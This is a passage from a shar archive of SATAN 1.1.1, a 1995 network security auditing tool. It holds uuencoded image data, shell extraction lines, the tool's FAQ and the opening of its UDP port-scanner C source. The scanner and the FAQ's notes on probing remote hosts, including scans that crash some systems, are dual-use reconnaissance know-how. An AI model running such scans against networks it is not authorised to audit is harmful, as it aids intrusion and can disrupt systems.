XMDJ5&24B.% +AJY8I0IFQ; U?X%@W8886%2GPFBPC16E(B$L6DLLP9'I$Y40Y
XM'+GU)YYS=!J=<9Q6GIQ\X8.B0LY?4'90X_"E(;^,WV[F)E*5>,AL8E0E9Q"W
XMSV)0P4V262,J#2E)%A: E/2*S'^@94T"X4R2HA,%/^_ %##^C)FO7&!FI$6S
XMYGR3D3[=0:+4Y(!*0;)>3T@%,[,F*H@,LVO@.4 " [ %F $_T ' .
XM<FMI=F5M86EL+FAT;6P !0 !; !/_ !P #G-U8G-C<FEB92YH=&UL '
XM 7( 4 < YM86IO<F1O;6\N:'1M; D %X % X ' .+FYE=W,N
XM9F%V;W)I=&4 !0 !?0 !0! !@ "&UD,BYH=&UL '1Y< !@ !+UW !
XM 6\ 4 80 3YP 4 1L:7-T !0 !0 !B0 !01 !@ ""YA<G1I8VQE
XM '1Y< !C !0# ! VUO<P 9 $@RP 4 9T=6YN96P !0 !EP
XM !0" " $&-H96-K9W)O=7!S+FEN970 !^T &; $_ % ';F5T<&EN
XM9P 9\ 4%0 4 <N;6%I;')C !I !0$ !@ "V-H96-K9W)O=7!S
XM !J P+, !0 !69R;71O (5 &L'-A=&%N+3$N,2XQ+VAT;6PO9&]T
XM<R]P:6YK9&]T+F=I9@
XM @(" V,# @ " @
XM(#0V-2 (" @-3 V( @(" @(" @(#$V-B @-3<S,3,T,S S-R @,3$W,S4
XM(

XM
XM
XM
XM
XM
XM

XM 1TE&
XM.#EA#@ . ,( /, Q\B2OX8 ;L, H)<=@5( 0^P3QK^_OR'Y! $ < +
XM . X ,[>+K<_BR8,4QX88 -QHT:8&R#\"DC$$B4(#"A,95" 7-M;2]S
XM7A2O1<!%_!4(C8#1B'0,?X(F9$I=) .P ,=VAI=&5D;W0N9VEF &8 :0
XM @ :>L !P #7EE;&QO=V1O="YG:68 &F @5F# I < $N>0)8*)7>#.9L3
XM'9.2?Z$D2WA+B0X_GCX_LC"CF%4TN I#KY2^N:1Y<Q0K!3ZVHZ$+HXZPIQ =
XM.9(J;LZICHPL$B1WGZ.5SJ,%5$1MLGSIARLEPTG)5+#9-J/6/[KQ(-#1^1'X
XM'/)D:(>V%?_PR )'*]\M9U 0?I$64!>M3RH\M$(X_J5 CB(++=9J8R>4N8Y%
XMEDQCP*?/$G2(-F;1),-32$-V&)$$Q<4?O4\1& Y,::L)(&S1:OG*Z:D*1HTU
XM,K)(5VO+A)R31MKB*4)DU6.H#&W5RB2J1:PQ)YPE.9*<"#@]EAWB2DW7UJQ5
XM#&X84R+8SH?(SN)ME))? ZDRE#FUX_:;X(LOIUC9VZF%XI2KXK7$>6T & .&
XM&;!(#";,77N.!>J3I--/Z ,Q$I^#:6=ET'>/(2]9,8;"F%2Q/4JF9?6"T&L-
XMG?*1(%6JE=FVP%YHN;IS871A;BTQ+C$N,2]H=&UL+V1O=',O<'5R<&QE9&]T
XM+F=I9@
XM (" @-C P( @(" T-C4@ " @(#4P
XM-B (" @(" @(" R,S$@(#4W,S$S-#,P,S<@(#$R,C<T "

XM
XM
XM
XM
XM
XM
XM

XM $=)1C@Y80X #@#C #$
XMB>%@ (F+ ,.< -VQ"/B^OKZ71+PT $JN<,A_ +A* &EP )MX$*:O /I %H
XM A^00! % "P #@ . $1K#(2:N]%!DA#+K(T(R-\&5"0ZR#L)R2
XMH0( ,21+0*6KC0>.W6 H^"F"$T-B^7,<%)F%-*!0' Z&"J+JO#) 1X<BBRF;
XM*1$ .W=D;W0N9VEF !I@(%9@P*0' !+GD"6"B5W@SF;$QV3DG^A)$MX2XD.
XM/YX^/[(PHYA5-+@*0Z^4OKFD>7,4*P4^MJ.A"Z..L*<0'3F2*F[.J8Z,+!(D
XM=Y^CE<ZC!51$;;)\Z8<K)<-)R52PV3:CUC^Z\2#0T?D1^!SR9&B'MA7_\,@"
XM1RO?+6=0$'Z1%E 7K4\J/+1"./ZE0(XB"RW6:F,GE+F.199,8\"GSQ)TB#9F
XMT23#4TA#=AB1!,7%'[U/$1@.3&FK"2!LT6KYRNFI"D:--3*R2%=KRX2<DT;:
XMXBE"9-5CJ QMU<HDJD6L,2><)3F2G @X/98=XDI-U]:L50QN&%,BV,Z'R,[B
XM;9227P.I,I0YM>/VF^"++Z=8V=NIA>*4J^*UQ'EM !@#AAFP2 PFS%U[C@7J
XMDZ333^@#,1*?@VEG9=!WCR$O63&&PIA4L3U*IF7U@M!K#9WRD2!5JI79ML!>
XM:+FZ<V%T86XM,2XQ+C$O:'1M;"]D;W1S+W)E9&1O="YG:68
XM
XM " @(#8P," (" @-#8U( @(" U,#8@ " @(" @(" @
XM,C,T(" U-S,Q,S0S,#,W(" Q,34T,@ @

XM
XM
XM
XM
XM
XM
XM

XM !'248X.6$. X XP F@ NZ1E:=Q Q
XM2@ 8P#YDG IN0 U8@ =6@ 8]@1+]P!,OVB!U@ _XHFW@ B(?D$ 0 L
XM X #@ !$D0R$FKO925U@J[3+.,RO%EHB(HS6&<4K$HCL,>P4"E@M :
XMC\2.PW$]$,))X< T(@BZ"2-@"#R.!$*APD @LU#0()$8;#'H-"4" #MT+F=I
XM9@ :8"!68,"D!P 2YY E@HE=X,YFQ,=DY)_H21+>$N)#C^>/C^R,*.8532X
XM"D.OE+ZYI'ES%"L%/K:CH0NCCK"G$!TYDBINSJF.C"P2)'>?HY7.HP541&VR
XM?.F'*R7#2<E4L-DVH]8_NO$@T-'Y$?@<\F1HA[85__#( D<KWRUG4!!^D190
XM%ZU/*CRT0CC^I4".(@LMUFIC)Y2YCD663&/ I\\2=(@V9M$DPU-(0W88D03%
XMQ1^]3Q$8#DQIJPD@;-%J^<KIJ0I&C34RLDA7:\N$G)-&VN(I0F358Z@,;=7*
XM)*I%K#$GG"4YDIP(.#V6'>)*3=?6K%4,;AA3(MC.A\C.XFV4DE\#J3*4.;7C
XM]IO@BR^G6-G;J87BE*OBM<1Y;0 8 X89L$@,)LQ=>XX%ZI.DTT_H S$2GX-I
XM9V70=X\A+UDQAL*85+$]2J9E]8+0:PV=\I$@5:J5V;; 7FBYNG-A=&%N+3$N
XM,2XQ+VAT;6PO9&]T<R]W:&ET961O="YG:68
XM
XM @(" V,# @ " @(#0V-2 (" @-3 V( @(" @(" @(#(S," @-3<S,3,T
XM,S S-R @,3(Q,#0 (

XM
XM
XM
XM
XM
XM
XM

XM 1TE&.#EA#@ . ., +&QL7-S<V=G9][>WM;6UL[.SL;&
XMQIR<G)*2DH2$A%I:6O___TI*2NGIZ;V]O2'Y! $ + . X 1%
XM$,A)J[WTF&W.-04C.EJEB>.!>).!BL63*)2+QHBRU(1#&('<8-=Z&(.ZAB"3
XM0,P$@T8#43$,AM)&XG(0+!8"*F9,ID0 #LE @ [="YG:68 &F @5F# I <
XM $N>0)8*)7>#.9L3'9.2?Z$D2WA+B0X_GCX_LC"CF%4TN I#KY2^N:1Y<Q0K
XM!3ZVHZ$+HXZPIQ =.9(J;LZICHPL$B1WGZ.5SJ,%5$1MLGSIARLEPTG)5+#9
XM-J/6/[KQ(-#1^1'X'/)D:(>V%?_PR )'*]\M9U 0?I$64!>M3RH\M$(X_J5
XMCB(++=9J8R>4N8Y%EDQCP*?/$G2(-F;1),-32$-V&)$$Q<4?O4\1& Y,::L)
XM(&S1:OG*Z:D*1HTU,K)(5VO+A)R31MKB*4)DU6.H#&W5RB2J1:PQ)YPE.9*<
XM"#@]EAWB2DW7UJQ5#&X84R+8SH?(SN)ME))? ZDRE#FUX_:;X(LOIUC9VZF%
XMXI2KXK7$>6T & .&&;!(#";,77N.!>J3I--/Z ,Q$I^#:6=ET'>/(2]9,8;"
XMF%2Q/4JF9?6"T&L-G?*1(%6JE=FVP%YHN;IS871A;BTQ+C$N,2]H=&UL+V1O
XM=',O>65L;&]W9&]T+F=I9@
XM (" @-C P( @
XM(" T-C4@ " @(#4P-B (" @(" @(" R,S(@(#4W,S$S-#,P,S<@(#$R,S Q

XM "
XM
XM
XM
XM
XM
XM

XM $=)
XM1C@Y80X #@#C #[_PZ @0+X]C))2@"YO!O+SDW]_P#.T@#AX!S'QW9J
XM; :2EP5760#*RPJ<G$HA^00! "P #@ . $1Q#(2:N]5!GGC+H*
XM<HR'\V5B, 2)PYR2<02*$B"N0#GSBC."Q@Z10" *P(9PLN$PDH1%Y@E<- B$
XM1T6QL&*S(&MCH<68SY0( #L .W0N9VEF !I@(%9@P*0' !+GD"6"B5W@SF;
XM$QV3DG^A)$MX2XD./YX^/[(PHYA5-+@*0Z^4OKFD>7,4*P4^MJ.A"Z..L*<0
XM'3F2*F[.J8Z,+!(D=Y^CE<ZC!51$;;)\Z8<K)<-)R52PV3:CUC^Z\2#0T?D1
XM^!SR9&B'MA7_\,@"1RO?+6=0$'Z1%E 7K4\J/+1"./ZE0(XB"RW6:F,GE+F.
XM199,8\"GSQ)TB#9FT23#4TA#=AB1!,7%'[U/$1@.3&FK"2!LT6KYRNFI"D:-
XM-3*R2%=KRX2<DT;:XBE"9-5CJ QMU<HDJD6L,2><)3F2G @X/98=XDI-U]:L
XM50QN&%,BV,Z'R,[B;9227P.I,I0YM>/VF^"++Z=8V=NIA>*4J^*UQ'EM !@#
XMAAFP2 PFS%U[C@7JDZ333^@#,1*?@VEG9=!WCR$O63&&PIA4L3U*IF7U@M!K
XM#9WRD2!5JI79ML!>:+FZ

XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM

X$
X
Xend
END_OF_FILE
if test 22615 -ne `wc -c <'satan-1.1.1/dots.tar.UU'`; then
echo shar: \"'satan-1.1.1/dots.tar.UU'\" unpacked with wrong size!
else
echo shar: Uudecoding \"'satan-1.1.1/dots.tar'\" $16384 characters$
cat satan-1.1.1/dots.tar.UU | uudecode
if test 16384 -ne `wc -c <'satan-1.1.1/dots.tar'`; then
echo shar: \"'satan-1.1.1/dots.tar'\" uudecoded with wrong size!
else
rm satan-1.1.1/dots.tar.UU
tar xf satan-1.1.1/dots.tar
if test -d 'satan-1.1.1/html/dots'; then
rm satan-1.1.1/dots.tar
else
echo shar: \"'satan-1.1.1/dots.tar'\" tar extract failed!
fi
fi
fi
# end of 'satan-1.1.1/dots.tar.UU'
fi
if test -f 'satan-1.1.1/html/docs/FAQ.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/FAQ.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/FAQ.html'\" $19441 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/FAQ.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>SATAN Frequently Asked Questions (FAQ)</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">SATAN Frequently Asked Questions (FAQ)</H1>
X<HR>
X<H3>Table of Contents</H3>
X(Last-modified: April 10th, 1995)
X<ul>
X<li> <a href="#general"> General Questions
X<li> <a href="#trouble"> Troubleshooting
X<li> <a href="#compare"> Comparisons, Hype, etc.
X<li> <a href="#tech"> Tech Stuff
X<li> <a href="#vital"> Really Important Things
X</ul>
X
X<hr>
X<a name="general"></a>
X<H3>General questions</H3>
X<UL>
X<li> <A HREF="intro.html#what-is-satan">What is SATAN?</A>
X<li> <a href="../name.html">Why is it called SATAN?</a>
X<li> <a href="philosophy.html">Why in the hell (ahem) was it written?</a>
X<li> <a href="system_requirements.html">What does it run on?</a>
X<li> <a href="system_requirements.html#other-requirements">How do you get it?</a>
X<li> <a href="copyright.html">Is it freeware, Public Domain, Copyrighted...?</a>
X<li> <a href="artwork.html">Who did the cool artwork?</a>
X<li> <a href="philosophy.html#money">Who paid for the development?</a>
X<li> <a href="philosophy.html#money">Does any company, government, or organization endorse it?</a>
X<li> <a href="philosophy.html#white-hats">Why don't you release it just to the white hats (what about the system crackers)?</a>
X</UL>
X
X<a name="trouble"></a>
X<H3>Troubleshooting</H3>
X<h4>(Getting it to work/run at all)</h4>
X<UL>
X<li><a href="#linux">I'm trying to get SATAN running on my Linux box.
XWhy won't it work?</a>
X<li><a href="#ultrix">I'm trying to get SATAN to compile on my ULTRIX box.
XWhy won't it work/where is rpgen?</a>
X<li><a href="#compress">What do I need to uncompress the SATAN tar file?</a>
X<li><a href="#get-perl">Where do I get a version of perl that will work?</a>
X<li><a href="#upgrade">When I try to run SATAN, it says (something like):
X"missing right bracket at perl/getfqdn.pl line 48, at end of line"</a>
X<li><a href="#ctime">When I try to run SATAN, it says (something like):
X"Can't locate ctime.pl in @INC at perl/status.pl line 5."</a>
X<li><a href="#x-stuff">When I try to run satan I get "Xlib:connection
Xto ":0.0" refused by server"</a>
X</ul>
X
X<h4>(Problems when running it)</h4>
X<ul>
X
X<li><a href="#bogus">SATAN doesn't find any hosts at all - it starts
Xand stops with "(0 host(s) visited)". This is bogus! Give me my
Xmoney back!</a>
X<li><a href="#crash">SATAN crashed, hung, or did very odd things to a system
Xthat it was run against.</a>
X<li><a href="FAQ.html#black-n-white">I'm using a B/W monitor, and it's
Xhard to see the difference between red and black dots. What can I do?</a>
X<li><a href="FAQ.html#www">How can I change from one HTML browser (e.g. Mosaic,
XNetscape, whatever) to another, without running reconfig or something?</a>
X<li><a href="FAQ.html#multi-fingers">Why does SATAN keep fingering the
Xsame host(s) over and over again?</a>
X<li><a href="#crash-n-burn">I ran SATAN to analyze my results and the
Xmachine slows grinds down to a standstill (and possibly crashes), but I
Xdon't get any answers.</a>
X<li><a href="#broken-dns">Given that Satan starts its own http server
Xon the local host, why doesn't it use 'localhost' instead of the FQDN
Xof the local host when trying to contact it?</a>
X<li><a href="#proxy">Whenever I click on a hyper link it doesn't work.</a>
X<li><a href="#merge">I merged some databases together with the "merge"
Xfunction in the <i>SATAN Data Management</i>, but when I exited SATAN,
Xthey weren't saved. What gives?</a>
X<li><a href="#processes">I get "bin/tcp_scan: socket: Too many open files"
Xin the window from which I start Satan.</a>
X
X</UL>
X
X<a name="compare"></a>
X<H3>Comparisons, Hype, etc.</H3>
X<UL>
X<li> <a href="#the-big-deal">What's the deal? Who cares? Why all the publicity?</a>
X<li> <a href="#satan-n-cops">What's the difference between it and COPS?</a>
X<li> <a href="#satan-n-iss">What's the difference between it and ISS and other remote scanners?</a>
X<li> <a href="#remote-audit">What's a remote security auditing tool/probe/scanner?</a>
X</UL>
X
X<a name="tech"></a>
X<H3>Tech stuff</H3>
X<UL>
X<li> <a href="#black-n-white">I'm using a B/W monitor, and it's hard to
Xsee the difference between red and black dots. What can I do?</a>
X<li> <a href="#www">How can I change from one HTML browser (e.g. Mosaic,
XNetscape, whatever) to another, without running reconfig or something?</a>
X<li> <a href="philosophy.html#why-scan">Why does it scan sites outside of
Xyour own domain?</a>
X<li> <a href="#warning-sites">Why doesn't it warn remote hosts that it is
Xprobing them?</a>
X<li> <A HREF="satan.probes.html">What is a .satan file, and how can I write
Xmy own?</A>
X<li> <A HREF="satan.rules.html">How can I write my own rules to teach SATAN
Xabout my site?</A>
X<li> <A HREF="satan.rules.html#drop">How can I teach SATAN to ignore
X what it thinks is a vulnerability?</A>
X<li> <a href="#multi-fingers">Why does SATAN keep fingering the same host(s)
Xover and over again?</a>
X<li> <a href="#died">SATAN died (or the machine crashed, or whatever)
Xin the middle of a run - do I have to start everything over again?</a>
X<li> <a href="#how-detect">How can I tell if anyone is running SATAN against
Xme?</a>
X<li> <a href="#different-os">{When is the port of/can you help me port/do
Xyou have any information on porting} SATAN to MacOS/DOS/VMS/MVS/Whatever?</a>
X<li> <a href="#tmp-files">I see a lot of odd files that are appearing
Xon my system after running SATAN, such as /tmp/sh11318, tmp_file.1288,
Xetc. What's the deal?</a>
X<li> <a href="#bug-check">Why doesn't SATAN check for
X[insert your favorite bug here]?</a>
X</UL>
X
X<a name="vital"></a>
X<H3>Really important things</H3>
X<UL>
X<li> <a href="#authors">How can I contact the authors?</a>
X<li> <a href="acknowledgements.html">Acknowledgements.</a>
X</UL>
X<hr>
X<a name="authors"><H3>How can I contact the authors?</H3></a>
X
XSend mail to <A HREF="mailto:sa...@fish.com">sa...@fish.com</A> (or click
Xon the e-mail address); this will be sent to both of the authors.
XFailing this, you can send mail directly to Dan:
X<A HREF="mailto:z...@fish.com">z...@fish.com</A>
Xor Wietse:
X<A HREF="mailto:wie...@wzv.win.tue.nl">wie...@wzv.win.tue.nl</A>
X
X<a name="the-big-deal"><H3>What's the deal? Who cares? Why all the publicity?</H3></a>
X
XSATAN appears to be a tool written at the right time. The current (as
Xof April, 1995) flurry of concern and press about SATAN is not really
Xall about SATAN - anything that is Internet related is big news these
Xdays. Combine that with the recent Mitnick/Shimomura hunt and capture,
Xas well as the latest IP spoofing techniques being publicized, and you
Xhave, for whatever reason, a big story in SATAN.
X<p>
XThere are some technical reasons why SATAN is important - it
X<STRONG>does</STRONG> do and detect things that weren't possible before,
Xat least by no other tools or methods that the authors knew about. It's
Xeasy to use, and fills a gap that was only poorly covered by previous
Xsoftware. However, the death of the Internet is not, and should not
Xbe predicted.
X
X<p>
X<a name="upgrade"><h3>When I try to run SATAN, it says (something like):
X"missing right bracket at perl/getfqdn.pl line 48, at end of line"</h3></a>
XYou need to upgrade your version of perl - you're probably using the
Xalpha version of perl5.
X
X<p>
X<a name="compress"><h3>What do I need to uncompress the SATAN tar file?</h3></a>
XTo uncompress the archives, you'll need to use the Un*x uncompress program
Xif it ends in ".Z", or the GNU unzip if it ends in ".gz".
X
X<p>
X<a name="get-perl"><h3>Where do I get a version of perl that will work?</h3></a>
Xperl5 is available via anonymous ftp from ftp.netlabs.com
X
X<p>
X<a name="ctime"><h3>When I try to run SATAN, it says (something like):
X"Can't locate ctime.pl in @INC at perl/status.pl line 5."</h3></a>
Xctime.pl is bundled with perl5; if you've installed that, you should
Xhave it - look for it in the library subdirectories. If it's there,
Xas a last resort you can copy "ctime.pl" (and perhaps "getopts.pl"
Xinto the main SATAN directory, and SATAN should find it there.
X
X<p>
X<a name="x-stuff"><h3>When I try to run satan I get "Xlib:connection
Xto ":0.0" refused by server"</h3></a>
XYou can do a "xhost +hostname", where "hostname" is the host you're
Xrunning it on, and try again. Also, look at
X<a href="../tutorials/vulnerability/SATAN_password_disclosure.html">
Xthe problems with X, networks, and SATAN</a>
X
X<p>
X<a name="ultrix"><h3>I'm trying to get SATAN to compile on my ULTRIX box.
XWhy won't it work/where is rpgen?</h3></a>
XDEC/Ultrix doesn't have "rpcgen". You'll need to run it
Xon another machine and drag the resulting source code over (or upgrade
Xto SATAN version 1.1 or better.)
X
X<p>
X<a name="bogus"><h3>SATAN doesn't find any hosts at all - it starts
Xand stops with "(0 host(s) visited)". This is bogus! Give me my
Xmoney back!</h3></a>
XCalm down. You probably can't use ICMP to detect if a host is alive
Xor not. Try setting "$dont_use_ping=1" in <i>config/satan.cf</i> (it's
Xnear the bottom.) It should work, or we'll give you double your money back.
X
X<p>
X<a name="crash"><H3>SATAN crashed, hung, or did very odd things to a system
Xthat it was run against.</H3></a>
XWe've received reports of various OS's that seem to have significant
Xtrouble with SATAN scans, particularily the UDP and TCP scans that span
Xlots of ports. Among the afflicted:
X
X<ul>
X<li>DEC Alphas running OSF/1 1.3 - generates a kernal memory fault when
Xthe UDP scan is done, rolls over and dies. The file system is sufficiently
Xhosed such that the system remains in single user mode upon reboot.
X<li>A few Mac's had ethernet problems, spewing packets back at the
XSATAN machine when fping-ed, causing the SATAN host to slow down
Xtremendously trying to handle the traffic.
X<li>OS/2, version 3.0 of the networking code. A report that it
Xlocked up the telnet and ftp daemons. A restart of inetd is required
Xto get things going again.
X<li>Ultrix systems running 4.2A - the elcsd process start
Xto loop, consuming all available CPU cycles.
X<li>SunOS 5.4 - an extra inetd process is forked off, adding 1.0 to
Xthe system load.
X</ul>
X
X<p>
X<a name="crash-n-burn"><H3>I ran SATAN to analyze my results and the
Xmachine slows grinds down to a standstill (and possibly crashes), but I
Xdon't get any answers.</H3></a>
X
XIt could be, with a large amount of data, that SATAN is using too much
Xmemory to fit in your machine. An enormous amount of memory is
Xconsumed by the program (see
X<a href="system_requirements.html#memory>memory requirements</a> for
Xmore on this.) Try checking the memory used by SATAN on your machine;
Xif it needs more, get more memory - adding swap space is a very painful
Xway of trying to deal with this.
X
X<p>
X<a name="broken-dns"><H3> Given that Satan starts its own http server
Xon the local host, why doesn't it use 'localhost' instead of the FQDN
Xof the local host when trying to contact it?</H3></a>
X
XThis breaks some HTML browsers. Try running with $dont_use_nslookup (found
Xin config/satan.cf) when your naming service is crippled.
X
X<p>
X<a name="proxy"><H3>Whenever I click on a hyper link it doesn't work.</H3></a>
XBe careful if you use proxy services (typically if you're behind a
Xfirewall you do) to access the WWW - you should unset environment
Xvariables (such as $http_proxy $file_proxy, $socks_ns, etc.) and/or
Xchange your browser's configuration to not use your SOCKS host or HTTP
XProxy host (in your HTML browser's option section.)
X
X<p>
X<a name="merge"><h3>I merged some databases together with the "merge"
Xfunction in the <i>SATAN Data Management</i>, but when I exited SATAN,
Xthey weren't saved. What gives?</h3></a>
XThe database merging only works in memory. Currently there is no way to
Xsave this to disk (until the next version of SATAN.)
X
X<p>
X<a name="processes"><h3>I get "bin/tcp_scan: socket: Too many open files"
Xin the window from which I start Satan.</h3></a>
XThe machine's open file table is getting exhausted. Tcp_scan backs off
Xand succeeds after a few attempts. You'll need to build a bigger kernel or
Xrun less processes.
X
X<p>
X<a name="linux"><H3>I'm trying to get SATAN running on my Linux box.</H3></a>
XLinux is far from a standard Un*x, and SATAN has a tendency to push the
XOS and perl to the limits. We've tried to do as much as possible to
Xmake it work, but there are probably various problems we haven't found
Xbecause we don't have a Linux box to play with. (Cross?) posting to
Xcomp.security.unix and comp.os.linux.* could probably give you more
Xhelp than we could.
X
X<p>
X<a name="warning-sites">
X<H3>Why doesn't it warn remote hosts that it is probing them?</H3></a>
X
XThis could be built into satan; the most reliable general solution
Xwould be to send mail to the probed system (say, to "root" or "postmaster").
XA beta-tester suggested that an entry could be written to the target's
Xsyslog. Neither of the solutions are incredibly reliable. The
Xformer relies on someone reading the mail and the account existing, as
Xwell as having to deal with hundreds if not thousands of pieces of mail
Xthat might go to machines that the user of SATAN controls. The latter
Xhas several problems, first and foremost in that it depends on people
Xactually looking at the syslog records, and secondly that if an intruder
Xuses SATAN to break in, they will typically "flatten", modify, or simply
Xdestroy such records. Finally, many systems don't run or have non-standard
Xsyslog programs and quite a few filter out requests with packet filters,
Xso they would never see the warning.
X<p>
XNonetheless, we'll probably be putting either or both of these as options in
Xthe next release of SATAN.
X
X<p>
X<a name="satan-n-cops"><H3>What's the difference between it and COPS?</H3></a>
X
XCOPS is a host-based Un*x security auditing tool; that means you run it
Xon the host you wish to examine the security of. SATAN is a remote
X<STRONG>network</STRONG> security auditing tool, which means it can report
Xon the security of any host OR network that has IP connectivity to where
Xyou run the tool; you don't need an account or privileges on the remote
Xtargets to report on them.
X
X<p>
X<a name="satan-n-iss"><H3>What's the difference between it and ISS and other remote scanners?</H3></a>
X
XISS, and any other remote auditing tool that we're aware of, scans a network
Xor remote host and then reports on any problems that it may find. While
XSATAN does that as well, the inferencing, the web of trust that it
Xuncovers, the automatic probing of secondary targets, the rich reporting
Xschema with context sensitive hypertext links to the documentation, the
Xrich configurability, etc. all make SATAN different to what is currently
Xavailable.
X
X<p>
X<a name="remote-audit"><H3>What's a remote security auditing tool/probe/scanner?</H3></a>
X
XThis means it can report on the security of any host OR network that has
XIP connectivity to where you run the tool; you don't need an account or
Xprivileges on the remote targets to report on them.
X
X<p>
X<a name="black-n-white"><H3>I'm using a B/W monitor, and it's hard to
Xsee the difference between red and black dots. What can I do?</H3></a>
XThe easiest thing to do is to just mv (or link or whatever) the
X<i>html/dots/whitedot.gif</i> to <i>html/dots/reddot.gif</i>. That'll
Xgive a much higher contrast and should be easier to read.
X
X<p>
X<a name="www"><H3>How can I change from one HTML browser (e.g. Mosaic,
XNetscape, whatever) to another, without running reconfig or something?</H3></a>
XSimply edit the file <i>config/paths.pl</i>. You'll see a line that
Xlooks like:
X<PRE>
X $MOSAIC = "/usr/local/bin/netscape";
X</PRE>
XChange the path inside the parenthesis to point to wherever your
Xpreferred browser is; for instance, if you want to use Mosaic, and it's
Xin <i>/usr/bin/X11</i>, you'd change the above line to:
X<PRE>
X $MOSAIC = "/usr/bin/X11/Mosaic";
X</PRE>
X
X<p>
X<a name="multi-fingers"><H3>Why does SATAN keep fingering the same host(s) over and over again?</H3></a>
X
XSATAN will finger a host repeatedly if it gets new information about the
Xhost; for instance, if it finds out that a user might exist on a host, it
Xwill finger to try and find out remote login information.
X
X<p>
X<a name="died"> <H3>SATAN died (or the machine crashed, or whatever)
Xin the middle of a run - do I have to start everything over again?</H3></a>
XSATAN saves data at regular intervals to its database files; the easiest
Xthing to do is to simply start it up again, with the same target and
Xprobe levels. If SATAN has remembered anything, it will grind away for
Xawhile, finding out what it has seen before, and then resume on the targets
Xthat it hasn't scanned.
X
X<p>
X<a name="how-detect"><H3>How can I tell if anyone is running SATAN against
Xme?</H3></a>
XCIAC wrote and is distrbuting something called
X<a href="http://ciac.llnl.gov/ciac/ToolsUnixNetMon.html#Courtney">
XCourtney</a>, but it is far from foolproof. It is very difficult
Xto detect the lighter SATAN scans; the heavier ones, however, are
Xtypically best detected by running Wietse's tcpd wrappers and examining
Xthe logs - a good tipoff is if many of your machines in the same area
Xlog connections from the same remote site. Some of the SATAN probes
Xoutput a message to the console - if users report odd messages on their
Xconsole screen, take them seriously ;-)
X
X<p>
X<a name="different-os"><H3>{When is the port of/can you help me port/do
Xyou have any information on porting} SATAN to MacOS/DOS/VMS/MVS/Whatever?</H3></a>
XSATAN, at least on the server side, is heavily linked to Un*x and perl5.
XWhile it might be possible to port SATAN to one of these other OS's (if
Xyou can call them that! ;-)) would be fairly difficult and not something
Xthat either one of us wants to touch with a ten foot (or ~ 3 meter) pole.
X
X<p>
X<a name="tmp-files"><H3>I see a lot of odd files that are appearing
Xon my system after running SATAN, such as /tmp/sh11318, tmp_file.1288,
Xetc. What's the deal?</H3></a>
X
XSATAN uses perl extensively in it's tests; the <i>.satan</i>
Xprobes use such commands as:
X<pre>
X open(FOO, "|program <<_EOF
X some input
X more input
X _EOF");
X</pre>
XThis will leave a temporary file behind when SATAN determines that they
Xhave run out of time and kill off the probe. Almost all temporary files
Xthat are created at various time within the SATAN are deleted
Xautomatically, but since the << files are created internally by the shell,
Xit is impossible for SATAN to know how to delete the files
Xthat remain. Simply delete them, or create a <i>cron</i> job to
Xautomatically sweep the <i>/tmp</i> directory for you.
X
X<p>
X<a name="bug-check"><H3>Why doesn't SATAN check for
X[insert your favorite bug here]?</H3></a>
XThere are several reasons why SATAN does not probe for all known bugs:
X<UL>
X<LI>Pointing out bugs is one thing, but fixing them is not always
Xpossible. With the first release, SATAN focuses on problems that can be
Xfixed or worked around by the system administrator, at least when the
Xoperating system version is reasonably up to date.
X<LI>The authors have only a few hours in the day available for SATAN
Xdevelopment, and writing the data collection tools wasn't nearly as much
Xfun as building the SATAN framework that controls them.
X<li>Many bugs are *extremely* difficult to check for, especially when
Xyou're dealing with code that has to return a yes or no in a very short
Xtime over potentially thousands of hosts.
X</UL>
X
X<hr>
X<p>
X<a href="../satan_documentation.html"> Back to the Documentation TOC</a>
X

X</BODY>
X</HTML>
END_OF_FILE

if test 19441 -ne `wc -c <'satan-1.1.1/html/docs/FAQ.html'`; then
echo shar: \"'satan-1.1.1/html/docs/FAQ.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/FAQ.html'
fi
if test -f 'satan-1.1.1/src/port_scan/udp_scan.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/port_scan/udp_scan.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/port_scan/udp_scan.c'\" $15255 characters$
sed "s/^X//" >'satan-1.1.1/src/port_scan/udp_scan.c' <<'END_OF_FILE'
X /*
X * udp-scan - determine available udp services
X *
X * Author: Wietse Venema.
X */
X
X#include <sys/types.h>
X#include <sys/param.h>
X#include <sys/socket.h>
X#include <sys/time.h>

X
X#include <netinet/in_systm.h>
X#include <netinet/in.h>
X#include <netinet/ip.h>
X#include <netinet/ip_icmp.h>

X#include <netinet/udp.h>
X
X#include <errno.h>
X#include <netdb.h>
X#include <stdio.h>
X#include <string.h>
X
Xextern int errno;
X
X#ifndef __STDC__
Xextern char *strerror();
X#endif
X
Xextern char *optarg;
Xextern int optind;
X
X#define offsetof(t,m) (size_t)(&(((t *)0)->m))
X

X#ifndef FD_SET
X#include <sys/select.h>
X#endif
X

X#include "lib.h"
X
X#define LOAD_LIMIT 100 /* default max nr of open sockets */
X#define AVG_MARGIN 10 /* safety margin */
X
X /*
X * In order to protect ourselves against dead hosts, we first probe UDP port
X * 1. If we do not get an ICMP error (no listener or host unreachable) we
X * assume this host is dead. If we do get an ICMP error, we have an estimate
X * of the roundtrip time. The test port can be changed with the -p option.
X */
Xchar *test_port = "1";
Xint test_portno;
X
X#define YES 1
X#define NO 0
X
Xint verbose = 0; /* default silent mode */
Xint open_file_limit; /* max nr of open files */
X
X /*
X * We attempt to send as many probes per roundtrip time as network capacity
X * permits. With UDP we must do our own retransmission and congestion
X * handling.
X */
Xint hard_limit = LOAD_LIMIT; /* max nr of open sockets */
Xint soft_limit; /* slowly-moving load limit */
X
Xstruct timeval now; /* global time after select() */
Xint ports_busy; /* number of open sockets */
Xint want_err = 0; /* show reachable/unreachable */
Xint show_all = 0; /* show all ports */
X
X /*
X * Information about ongoing probes is sorted by time of last transmission.
X */
Xstruct port_info {
X RING ring; /* round-robin linkage */
X struct timeval last_probe; /* time of last probe */
X int port; /* port number */
